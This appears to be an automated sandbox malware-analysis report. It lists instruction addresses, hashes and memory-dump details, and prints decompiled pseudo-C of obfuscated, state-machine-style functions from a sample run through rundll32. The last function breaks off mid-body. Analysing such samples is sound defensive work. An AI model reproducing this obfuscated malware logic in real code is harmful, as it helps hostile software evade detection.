                                                                                                                          0x007948f1
                                                                                                                          0x007948f6
                                                                                                                          0x007948fe
                                                                                                                          0x00794906
                                                                                                                          0x0079490e
                                                                                                                          0x00794916
                                                                                                                          0x0079491e
                                                                                                                          0x00794926
                                                                                                                          0x0079492e
                                                                                                                          0x00794936
                                                                                                                          0x0079493e
                                                                                                                          0x00794948
                                                                                                                          0x0079494c
                                                                                                                          0x00794954
                                                                                                                          0x0079495c
                                                                                                                          0x00794964
                                                                                                                          0x0079496c
                                                                                                                          0x0079497c
                                                                                                                          0x00794980
                                                                                                                          0x00794988
                                                                                                                          0x00794994
                                                                                                                          0x00794997
                                                                                                                          0x0079499b
                                                                                                                          0x007949a3
                                                                                                                          0x007949ab
                                                                                                                          0x007949b3
                                                                                                                          0x007949bb
                                                                                                                          0x007949c3
                                                                                                                          0x007949cb
                                                                                                                          0x007949d5
                                                                                                                          0x007949e3
                                                                                                                          0x007949e8
                                                                                                                          0x007949ee
                                                                                                                          0x007949fb
                                                                                                                          0x00794a03
                                                                                                                          0x00794a0b
                                                                                                                          0x00794a13
                                                                                                                          0x00794a1b
                                                                                                                          0x00794a23
                                                                                                                          0x00794a2f
                                                                                                                          0x00794a37
                                                                                                                          0x00794a3b
                                                                                                                          0x00794a43
                                                                                                                          0x00794a4b
                                                                                                                          0x00794a53
                                                                                                                          0x00794a5b
                                                                                                                          0x00794a63
                                                                                                                          0x00794a6b
                                                                                                                          0x00794a73
                                                                                                                          0x00794a7b
                                                                                                                          0x00794a83
                                                                                                                          0x00794a83
                                                                                                                          0x00794a8d
                                                                                                                          0x00794ac9
                                                                                                                          0x00000000
                                                                                                                          0x00794a8f
                                                                                                                          0x00794a91
                                                                                                                          0x00794b4f
                                                                                                                          0x00794a97
                                                                                                                          0x00794a9d
                                                                                                                          0x00000000
                                                                                                                          0x00794a9f
                                                                                                                          0x00794aaf
                                                                                                                          0x00794ab0
                                                                                                                          0x00794ab9
                                                                                                                          0x00794abf
                                                                                                                          0x00794ac5
                                                                                                                          0x00000000
                                                                                                                          0x00794ac5
                                                                                                                          0x00794abf
                                                                                                                          0x00794a9d
                                                                                                                          0x00794a91
                                                                                                                          0x00794b58
                                                                                                                          0x00794b60
                                                                                                                          0x00794b60
                                                                                                                          0x00794afa
                                                                                                                          0x00794aff
                                                                                                                          0x00794b04
                                                                                                                          0x00794b10
                                                                                                                          0x00000000
                                                                                                                          0x00794b06
                                                                                                                          0x00794b06
                                                                                                                          0x00000000
                                                                                                                          0x00794b06
                                                                                                                          0x00000000
                                                                                                                          0x00794b15
                                                                                                                          0x00794b15
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: -e$62$?M'$h\c$z
                                                                                                                          • API String ID: 0-1842174784
                                                                                                                          • Opcode ID: 3bb5ab6fe4e144f6f9fa152f4c768ba037a2635da891751e18d7284d158d406f
                                                                                                                          • Instruction ID: e93e46f25e36b66f9bd8a9b80bad2c90beb704b34990ec439ee109982ef3eaed
                                                                                                                          • Opcode Fuzzy Hash: 3bb5ab6fe4e144f6f9fa152f4c768ba037a2635da891751e18d7284d158d406f
                                                                                                                          • Instruction Fuzzy Hash: DA812EB15093819FD7A8CF61D58991BBBF1FBD9758F408A0CF29586260D3B6CA098F42
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007ABE27 Relevance: 6.4, Strings: 5, Instructions: 130COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 94%
                                                                                                                          			E007ABE27(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v320;
				char _t133;
				signed int _t136;
				void* _t139;
				signed int _t141;
				signed int _t142;
				signed int _t143;
				char* _t144;
				intOrPtr* _t163;
				void* _t164;

				_v40 = 0x365269;
				_v40 = _v40 >> 7;
				_v40 = _v40 ^ 0x00099806;
				_v16 = 0x620947;
				_v16 = _v16 + 0x25da;
				_v16 = _v16 | 0xf0dff1a3;
				_v16 = _v16 + 0xffff8fd5;
				_v16 = _v16 ^ 0xf0f65193;
				_v60 = 0x4a6911;
				_v60 = _v60 >> 2;
				_v60 = _v60 ^ 0x0015bfec;
				_v32 = 0xee641f;
				_v32 = _v32 ^ 0x54466854;
				_v32 = _v32 ^ 0x51df3278;
				_v32 = _v32 ^ 0x057124b2;
				_v36 = 0x2245a1;
				_t163 = __ecx;
				_t141 = 0x59;
				_v36 = _v36 / _t141;
				_t142 = 0x7c;
				_v36 = _v36 / _t142;
				_v36 = _v36 ^ 0x00022b59;
				_v52 = 0x17e728;
				_v52 = _v52 << 7;
				_v52 = _v52 ^ 0x0bfefc33;
				_v24 = 0x5a7c12;
				_v24 = _v24 + 0xffff6a30;
				_v24 = _v24 + 0xb9bd;
				_v24 = _v24 ^ 0x00522d4c;
				_v8 = 0x70b293;
				_v8 = _v8 ^ 0xb7f64013;
				_v8 = _v8 | 0x98950303;
				_v8 = _v8 << 0x10;
				_v8 = _v8 ^ 0xf38d6f21;
				_v28 = 0x5e48e6;
				_v28 = _v28 >> 2;
				_v28 = _v28 << 0xf;
				_v28 = _v28 ^ 0xc917f664;
				_v44 = 0xd34be4;
				_v44 = _v44 ^ 0x1af04c78;
				_v44 = _v44 ^ 0x1a25cf5b;
				_v56 = 0x13a2c8;
				_v56 = _v56 ^ 0x00107e6c;
				_v20 = 0x6acc1;
				_t143 = 0x48;
				_v20 = _v20 * 0x75;
				_v20 = _v20 | 0x5ce04716;
				_v20 = _v20 ^ 0xfe39b07b;
				_v20 = _v20 ^ 0xa1d6ae77;
				_v48 = 0x9d30cb;
				_t144 =  &_v320;
				_v48 = _v48 / _t143;
				_v48 = _v48 ^ 0x00028c5d;
				_v12 = 0x456efe;
				_v12 = _v12 + 0xffff4082;
				_v12 = _v12 >> 1;
				_v12 = _v12 ^ 0xdbb5e427;
				_v12 = _v12 ^ 0xdb99f5c8;
				while(1) {
					_t133 =  *_t163;
					if(_t133 == 0) {
						break;
					}
					if(_t133 == 0x2e) {
						 *_t144 = 0;
					} else {
						 *_t144 = _t133;
						_t144 = _t144 + 1;
						_t163 = _t163 + 1;
						continue;
					}
					L6:
					_t164 = E0079ADE6(_v40, _v16,  &_v320, _v60);
					if(_t164 != 0) {
						L8:
						_t136 = E007ADBEA(_t163 + 1, _v8, _v28, _v44);
						_push(_v12);
						_push(_t136 ^ 0x2ac2611c);
						_push(_v48);
						_push(_t164);
						return E0079CDCD(_v56, _v20);
					}
					_t139 = E007ACADF(_v32,  &_v320, _v36, _v52);
					_t164 = _t139;
					if(_t164 != 0) {
						goto L8;
					}
					return _t139;
				}
				goto L6;
			}



























                                                                                                                          0x007abe30
                                                                                                                          0x007abe39
                                                                                                                          0x007abe3d
                                                                                                                          0x007abe44
                                                                                                                          0x007abe4b
                                                                                                                          0x007abe52
                                                                                                                          0x007abe59
                                                                                                                          0x007abe60
                                                                                                                          0x007abe67
                                                                                                                          0x007abe6e
                                                                                                                          0x007abe72
                                                                                                                          0x007abe79
                                                                                                                          0x007abe80
                                                                                                                          0x007abe87
                                                                                                                          0x007abe8e
                                                                                                                          0x007abe95
                                                                                                                          0x007abea3
                                                                                                                          0x007abea5
                                                                                                                          0x007abeaa
                                                                                                                          0x007abeb2
                                                                                                                          0x007abeb7
                                                                                                                          0x007abebc
                                                                                                                          0x007abec3
                                                                                                                          0x007abeca
                                                                                                                          0x007abece
                                                                                                                          0x007abed5
                                                                                                                          0x007abedc
                                                                                                                          0x007abee3
                                                                                                                          0x007abeea
                                                                                                                          0x007abef1
                                                                                                                          0x007abef8
                                                                                                                          0x007abeff
                                                                                                                          0x007abf06
                                                                                                                          0x007abf0a
                                                                                                                          0x007abf11
                                                                                                                          0x007abf18
                                                                                                                          0x007abf1c
                                                                                                                          0x007abf20
                                                                                                                          0x007abf27
                                                                                                                          0x007abf2e
                                                                                                                          0x007abf35
                                                                                                                          0x007abf3c
                                                                                                                          0x007abf49
                                                                                                                          0x007abf50
                                                                                                                          0x007abf5b
                                                                                                                          0x007abf5c
                                                                                                                          0x007abf5f
                                                                                                                          0x007abf66
                                                                                                                          0x007abf6d
                                                                                                                          0x007abf74
                                                                                                                          0x007abf80
                                                                                                                          0x007abf86
                                                                                                                          0x007abf89
                                                                                                                          0x007abf90
                                                                                                                          0x007abf97
                                                                                                                          0x007abf9e
                                                                                                                          0x007abfa1
                                                                                                                          0x007abfa8
                                                                                                                          0x007abfb9
                                                                                                                          0x007abfb9
                                                                                                                          0x007abfbd
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007abfb3
                                                                                                                          0x007abfc1
                                                                                                                          0x007abfb5
                                                                                                                          0x007abfb5
                                                                                                                          0x007abfb7
                                                                                                                          0x007abfb8
                                                                                                                          0x00000000
                                                                                                                          0x007abfb8
                                                                                                                          0x007abfc4
                                                                                                                          0x007abfd9
                                                                                                                          0x007abfdf
                                                                                                                          0x007abffd
                                                                                                                          0x007ac00c
                                                                                                                          0x007ac011
                                                                                                                          0x007ac019
                                                                                                                          0x007ac01a
                                                                                                                          0x007ac023
                                                                                                                          0x00000000
                                                                                                                          0x007ac029
                                                                                                                          0x007abff0
                                                                                                                          0x007abff5
                                                                                                                          0x007abffb
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007ac031
                                                                                                                          0x007ac031
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Gb$L-R$ThFT$iR6$H^
                                                                                                                          • API String ID: 0-1567385930
                                                                                                                          • Opcode ID: 530a903c014da879c72b207405b5d78bc36da64ddf1a64a5b02b4b5b0fc68630
                                                                                                                          • Instruction ID: c85078083f4810a1dd7f19811c86754eccd34787968a000f474ff3d5e2ea7994
                                                                                                                          • Opcode Fuzzy Hash: 530a903c014da879c72b207405b5d78bc36da64ddf1a64a5b02b4b5b0fc68630
                                                                                                                          • Instruction Fuzzy Hash: 07514271C05219EBDF08CFA4E94A8EEFBB1FF49314F208159D412BA260C3B91A05CF94
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 1001B43F Relevance: 6.0, APIs: 4, Instructions: 41keyboardwindowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                          • GetKeyState.USER32(00000010), ref: 1001B463
                                                                                                                          • GetKeyState.USER32(00000011), ref: 1001B46C
                                                                                                                          • GetKeyState.USER32(00000012), ref: 1001B475
                                                                                                                          • SendMessageA.USER32 ref: 1001B48B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: State$LongMessageSendWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1063413437-0
                                                                                                                          • Opcode ID: cbe92a3c8afafbb230f3664375f9361b4519f62e794af51cea28ccd5527820e8
                                                                                                                          • Instruction ID: b089c7fc05c7e6fbdd4fc06f52c570ea12a8721339fdd196cb0bdf3cbec2e35a
                                                                                                                          • Opcode Fuzzy Hash: cbe92a3c8afafbb230f3664375f9361b4519f62e794af51cea28ccd5527820e8
                                                                                                                          • Instruction Fuzzy Hash: F6F0E97679075A27EB20BA744CC1F9A0154DF89BD9F028534B741EE0D3DBB0C8819170
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007A20BA Relevance: 5.2, Strings: 4, Instructions: 240COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 76%
                                                                                                                          			E007A20BA() {
				char _v520;
				signed int _v524;
				unsigned int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _t227;
				intOrPtr _t228;
				signed int _t230;
				void* _t231;
				intOrPtr _t235;
				intOrPtr _t245;
				void* _t247;
				intOrPtr _t254;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				void* _t277;
				signed int* _t279;
				void* _t283;

				_t279 =  &_v624;
				_v612 = 0x15bebb;
				_v612 = _v612 ^ 0x0c09d82a;
				_t247 = 0x7e01d7;
				_v612 = _v612 + 0xffff69e9;
				_v612 = _v612 ^ 0xcffb1e8d;
				_v612 = _v612 ^ 0xc3e0ceeb;
				_v596 = 0xb5bc7f;
				_v596 = _v596 << 0xa;
				_v596 = _v596 + 0xbaa7;
				_v596 = _v596 ^ 0xd6f2b68e;
				_v600 = 0x5909af;
				_v600 = _v600 ^ 0x0096463d;
				_v600 = _v600 >> 3;
				_v600 = _v600 ^ 0x0016e9cd;
				_v548 = 0x801d18;
				_v548 = _v548 + 0xffffc800;
				_v548 = _v548 ^ 0x0070ca5a;
				_v580 = 0x2361dd;
				_v580 = _v580 * 0x6f;
				_t277 = 0;
				_v580 = _v580 << 0xe;
				_v580 = _v580 ^ 0xdbb34e1e;
				_v528 = 0x864281;
				_v528 = _v528 >> 0xc;
				_v528 = _v528 ^ 0x0000b217;
				_v560 = 0x478502;
				_v560 = _v560 | 0x3d47d1eb;
				_v560 = _v560 ^ 0x3d4c1a49;
				_v540 = 0x8f961f;
				_v540 = _v540 >> 0xc;
				_v540 = _v540 ^ 0x000d133d;
				_v572 = 0xef4b2;
				_v572 = _v572 << 0xd;
				_v572 = _v572 + 0xffff85b1;
				_v572 = _v572 ^ 0xde949f86;
				_v608 = 0x8e969a;
				_v608 = _v608 << 0xd;
				_t272 = 0x21;
				_v608 = _v608 / _t272;
				_t273 = 0x2f;
				_v608 = _v608 / _t273;
				_v608 = _v608 ^ 0x002a10b8;
				_v620 = 0x864bbd;
				_v620 = _v620 << 0x10;
				_v620 = _v620 + 0x87ba;
				_v620 = _v620 + 0x936f;
				_v620 = _v620 ^ 0x4bb78bcc;
				_v564 = 0xfb8a17;
				_t274 = 0x62;
				_v564 = _v564 * 0x63;
				_v564 = _v564 ^ 0x61429d97;
				_v576 = 0x222f;
				_v576 = _v576 >> 4;
				_v576 = _v576 ^ 0xf39884cf;
				_v576 = _v576 ^ 0xf39d4647;
				_v556 = 0x6068cb;
				_v556 = _v556 ^ 0xfe1a734d;
				_v556 = _v556 ^ 0xfe79d9b4;
				_v616 = 0xc46e23;
				_v616 = _v616 >> 2;
				_v616 = _v616 / _t274;
				_v616 = _v616 * 0x76;
				_v616 = _v616 ^ 0x003e2a5a;
				_v624 = 0x4617e4;
				_v624 = _v624 + 0xffff4d74;
				_v624 = _v624 ^ 0x9dcdfd87;
				_v624 = _v624 + 0x3fd8;
				_v624 = _v624 ^ 0x9d89a5c2;
				_v588 = 0x3a0167;
				_v588 = _v588 << 1;
				_v588 = _v588 + 0xffff1a51;
				_v588 = _v588 ^ 0x00728a40;
				_v532 = 0x3a363e;
				_v532 = _v532 ^ 0xe52a74a2;
				_v532 = _v532 ^ 0xe514694b;
				_v544 = 0x52d5cb;
				_v544 = _v544 | 0x185d0a08;
				_v544 = _v544 ^ 0x18524fe5;
				_v584 = 0x37b3aa;
				_v584 = _v584 + 0xebef;
				_t275 = 0x72;
				_v584 = _v584 * 0x28;
				_v584 = _v584 ^ 0x08d0b087;
				_v592 = 0xa4bebe;
				_v592 = _v592 >> 8;
				_v592 = _v592 | 0x739fbd45;
				_v592 = _v592 ^ 0x739593e3;
				_v552 = 0x17b1c;
				_v552 = _v552 << 0xe;
				_v552 = _v552 ^ 0x5ecd7403;
				_v568 = 0x403d75;
				_v568 = _v568 >> 3;
				_v568 = _v568 | 0x80b15bc0;
				_v568 = _v568 ^ 0x80b9a416;
				_v536 = 0x2ed64e;
				_t276 = _v524;
				_v536 = _v536 / _t275;
				_v536 = _v536 ^ 0x00033d67;
				_v604 = 0x8b403d;
				_v604 = _v604 + 0xffff3866;
				_v604 = _v604 << 8;
				_v604 = _v604 ^ 0x8a7a6cd3;
				goto L1;
				do {
					while(1) {
						L1:
						_t283 = _t247 - 0x73dad95;
						if(_t283 > 0) {
							break;
						}
						if(_t283 == 0) {
							E007ADA22(_v544, _v584, __eflags, _v592,  &_v520, _t247, _v552);
							_t235 = E00792051(_v536,  &_v520, _v604);
							_t254 =  *0x7b3e10; // 0x0
							 *((intOrPtr*)(_t254 + 0x10)) = _t235;
						} else {
							if(_t247 == 0x7e01d7) {
								_push(_t247);
								_push(_t247);
								 *0x7b3e10 = E00797FF2(0x45c);
								_t247 = 0x8643fcd;
								continue;
							} else {
								if(_t247 == 0xd34913) {
									_t247 = 0x148c4fa;
									_v524 = _v596;
									continue;
								} else {
									if(_t247 == 0xfeb697) {
										_v524 = _v612;
										goto L8;
									} else {
										if(_t247 != 0x148c4fa) {
											goto L20;
										} else {
											E007A8F9E(_v620, _v564, _v576, _v556, _t276);
											_t279 =  &(_t279[3]);
											L8:
											_t247 = 0xac90332;
											continue;
										}
									}
								}
							}
						}
						L23:
						return _t277;
					}
					__eflags = _t247 - 0x8643fcd;
					if(_t247 == 0x8643fcd) {
						_t227 = E0079912C(_v600, _v560, _t247, _v540, _t247, _v572, _v608);
						_t276 = _t227;
						_t279 =  &(_t279[5]);
						__eflags = _t227;
						if(__eflags == 0) {
							_t247 = 0xfeb697;
							goto L20;
						} else {
							_t245 =  *0x7b3e10; // 0x0
							 *((intOrPtr*)(_t245 + 0x450)) = 1;
							_t247 = 0xd34913;
							goto L1;
						}
					} else {
						__eflags = _t247 - 0xac90332;
						if(_t247 == 0xac90332) {
							_push(_v532);
							_push(_v524);
							_push(_v588);
							_t228 =  *0x7b3e10; // 0x0
							_push(_t228 + 0x23c);
							_t230 = E007A46BB(_v616, _v624);
							_t279 = _t279 - 0xc + 0x1c;
							_t247 = 0xe2d9513;
							__eflags = _t230;
							_t231 = 1;
							_t277 =  ==  ? _t231 : _t277;
							goto L1;
						} else {
							__eflags = _t247 - 0xe2d9513;
							if(_t247 != 0xe2d9513) {
								goto L20;
							} else {
								E0079A55F();
								_t247 = 0x73dad95;
								goto L1;
							}
						}
					}
					goto L23;
					L20:
					__eflags = _t247 - 0x13a2d4a;
				} while (__eflags != 0);
				goto L23;
			}













































                                                                                                                          0x007a20ba
                                                                                                                          0x007a20c0
                                                                                                                          0x007a20ca
                                                                                                                          0x007a20d2
                                                                                                                          0x007a20d7
                                                                                                                          0x007a20df
                                                                                                                          0x007a20e7
                                                                                                                          0x007a20ef
                                                                                                                          0x007a20f7
                                                                                                                          0x007a20fc
                                                                                                                          0x007a2104
                                                                                                                          0x007a210c
                                                                                                                          0x007a2114
                                                                                                                          0x007a211c
                                                                                                                          0x007a2121
                                                                                                                          0x007a2129
                                                                                                                          0x007a2131
                                                                                                                          0x007a2139
                                                                                                                          0x007a2141
                                                                                                                          0x007a2152
                                                                                                                          0x007a2156
                                                                                                                          0x007a2158
                                                                                                                          0x007a215d
                                                                                                                          0x007a2165
                                                                                                                          0x007a216d
                                                                                                                          0x007a2172
                                                                                                                          0x007a217a
                                                                                                                          0x007a2182
                                                                                                                          0x007a218a
                                                                                                                          0x007a2192
                                                                                                                          0x007a219a
                                                                                                                          0x007a219f
                                                                                                                          0x007a21a7
                                                                                                                          0x007a21af
                                                                                                                          0x007a21b4
                                                                                                                          0x007a21bc
                                                                                                                          0x007a21c4
                                                                                                                          0x007a21cc
                                                                                                                          0x007a21d7
                                                                                                                          0x007a21dc
                                                                                                                          0x007a21e6
                                                                                                                          0x007a21eb
                                                                                                                          0x007a21f1
                                                                                                                          0x007a21f9
                                                                                                                          0x007a2201
                                                                                                                          0x007a2206
                                                                                                                          0x007a220e
                                                                                                                          0x007a2216
                                                                                                                          0x007a221e
                                                                                                                          0x007a222b
                                                                                                                          0x007a222c
                                                                                                                          0x007a2230
                                                                                                                          0x007a2238
                                                                                                                          0x007a2240
                                                                                                                          0x007a2245
                                                                                                                          0x007a224d
                                                                                                                          0x007a2255
                                                                                                                          0x007a225d
                                                                                                                          0x007a2265
                                                                                                                          0x007a226d
                                                                                                                          0x007a2275
                                                                                                                          0x007a2280
                                                                                                                          0x007a2289
                                                                                                                          0x007a228d
                                                                                                                          0x007a2297
                                                                                                                          0x007a22a4
                                                                                                                          0x007a22b1
                                                                                                                          0x007a22b9
                                                                                                                          0x007a22c1
                                                                                                                          0x007a22c9
                                                                                                                          0x007a22d1
                                                                                                                          0x007a22d5
                                                                                                                          0x007a22dd
                                                                                                                          0x007a22e5
                                                                                                                          0x007a22ed
                                                                                                                          0x007a22f5
                                                                                                                          0x007a22fd
                                                                                                                          0x007a2305
                                                                                                                          0x007a230d
                                                                                                                          0x007a2315
                                                                                                                          0x007a231d
                                                                                                                          0x007a232c
                                                                                                                          0x007a232d
                                                                                                                          0x007a2331
                                                                                                                          0x007a2339
                                                                                                                          0x007a2341
                                                                                                                          0x007a2346
                                                                                                                          0x007a234e
                                                                                                                          0x007a2356
                                                                                                                          0x007a235e
                                                                                                                          0x007a2363
                                                                                                                          0x007a236b
                                                                                                                          0x007a2373
                                                                                                                          0x007a2378
                                                                                                                          0x007a2380
                                                                                                                          0x007a2388
                                                                                                                          0x007a2396
                                                                                                                          0x007a239a
                                                                                                                          0x007a239e
                                                                                                                          0x007a23a6
                                                                                                                          0x007a23ae
                                                                                                                          0x007a23b6
                                                                                                                          0x007a23bb
                                                                                                                          0x007a23bb
                                                                                                                          0x007a23c3
                                                                                                                          0x007a23c3
                                                                                                                          0x007a23c3
                                                                                                                          0x007a23c3
                                                                                                                          0x007a23c5
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007a23cb
                                                                                                                          0x007a2519
                                                                                                                          0x007a2532
                                                                                                                          0x007a2537
                                                                                                                          0x007a2540
                                                                                                                          0x007a23d1
                                                                                                                          0x007a23d7
                                                                                                                          0x007a243c
                                                                                                                          0x007a243d
                                                                                                                          0x007a2445
                                                                                                                          0x007a244a
                                                                                                                          0x00000000
                                                                                                                          0x007a23d9
                                                                                                                          0x007a23df
                                                                                                                          0x007a2420
                                                                                                                          0x007a2425
                                                                                                                          0x00000000
                                                                                                                          0x007a23e1
                                                                                                                          0x007a23e7
                                                                                                                          0x007a2416
                                                                                                                          0x00000000
                                                                                                                          0x007a23e9
                                                                                                                          0x007a23ef
                                                                                                                          0x00000000
                                                                                                                          0x007a23f5
                                                                                                                          0x007a2406
                                                                                                                          0x007a240b
                                                                                                                          0x007a240e
                                                                                                                          0x007a240e
                                                                                                                          0x00000000
                                                                                                                          0x007a240e
                                                                                                                          0x007a23ef
                                                                                                                          0x007a23e7
                                                                                                                          0x007a23df
                                                                                                                          0x007a23d7
                                                                                                                          0x007a2544
                                                                                                                          0x007a254f
                                                                                                                          0x007a254f
                                                                                                                          0x007a2454
                                                                                                                          0x007a245a
                                                                                                                          0x007a24ca
                                                                                                                          0x007a24cf
                                                                                                                          0x007a24d1
                                                                                                                          0x007a24d4
                                                                                                                          0x007a24d6
                                                                                                                          0x007a24f0
                                                                                                                          0x00000000
                                                                                                                          0x007a24d8
                                                                                                                          0x007a24d8
                                                                                                                          0x007a24e0
                                                                                                                          0x007a24e6
                                                                                                                          0x00000000
                                                                                                                          0x007a24e6
                                                                                                                          0x007a245c
                                                                                                                          0x007a245c
                                                                                                                          0x007a245e
                                                                                                                          0x007a2478
                                                                                                                          0x007a247c
                                                                                                                          0x007a2480
                                                                                                                          0x007a2484
                                                                                                                          0x007a2499
                                                                                                                          0x007a249a
                                                                                                                          0x007a249f
                                                                                                                          0x007a24a2
                                                                                                                          0x007a24a7
                                                                                                                          0x007a24ab
                                                                                                                          0x007a24ac
                                                                                                                          0x00000000
                                                                                                                          0x007a2460
                                                                                                                          0x007a2460
                                                                                                                          0x007a2466
                                                                                                                          0x00000000
                                                                                                                          0x007a246c
                                                                                                                          0x007a246c
                                                                                                                          0x007a2471
                                                                                                                          0x00000000
                                                                                                                          0x007a2471
                                                                                                                          0x007a2466
                                                                                                                          0x007a245e
                                                                                                                          0x00000000
                                                                                                                          0x007a24f5
                                                                                                                          0x007a24f5
                                                                                                                          0x007a24f5
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: /"$>6:$Z*>$u=@
                                                                                                                          • API String ID: 0-89199335
                                                                                                                          • Opcode ID: 23410f440b74fbbc98db1310c3a234183f2d58e846f3022e529807108fdb6030
                                                                                                                          • Instruction ID: 478e42aaeddd4451b1167ce6cb467f104364339123f4a0b67e9e24287866daea
                                                                                                                          • Opcode Fuzzy Hash: 23410f440b74fbbc98db1310c3a234183f2d58e846f3022e529807108fdb6030
                                                                                                                          • Instruction Fuzzy Hash: BBB103711083809FC758CF69C48A81FBBE1FBD5748F109A1DF69286261D3B9C949CF42
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00795548 Relevance: 5.2, Strings: 4, Instructions: 233COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 94%
                                                                                                                          			E00795548(void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				char _v16;
				intOrPtr _v24;
				char _v28;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v64;
				signed int _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				unsigned int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				void* __ecx;
				void* _t190;
				void* _t206;
				void* _t208;
				signed int _t209;
				char* _t211;
				signed int _t212;
				intOrPtr _t222;
				intOrPtr* _t225;
				void* _t227;
				char* _t229;
				char _t233;
				intOrPtr _t255;
				intOrPtr* _t257;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int* _t263;

				_t225 = _a16;
				_t257 = _a4;
				_push(_t225);
				_push(_a12);
				_push(_a8);
				_push(_t257);
				_push(__edx);
				E007A20B9(_t190);
				_v56 = 0xb9e7cb;
				_t255 = 0;
				_v52 = 0x6e87b5;
				_t263 =  &(( &_v148)[6]);
				_v48 = 0;
				_v44 = 0;
				_t227 = 0x3ccc1e9;
				_v128 = 0x85629b;
				_t258 = 0x62;
				_v128 = _v128 * 0x5a;
				_v128 = _v128 + 0xfbaf;
				_v128 = _v128 ^ 0x2ee5a62d;
				_v144 = 0xfc0c7f;
				_v144 = _v144 ^ 0xfdfaf442;
				_v144 = _v144 >> 1;
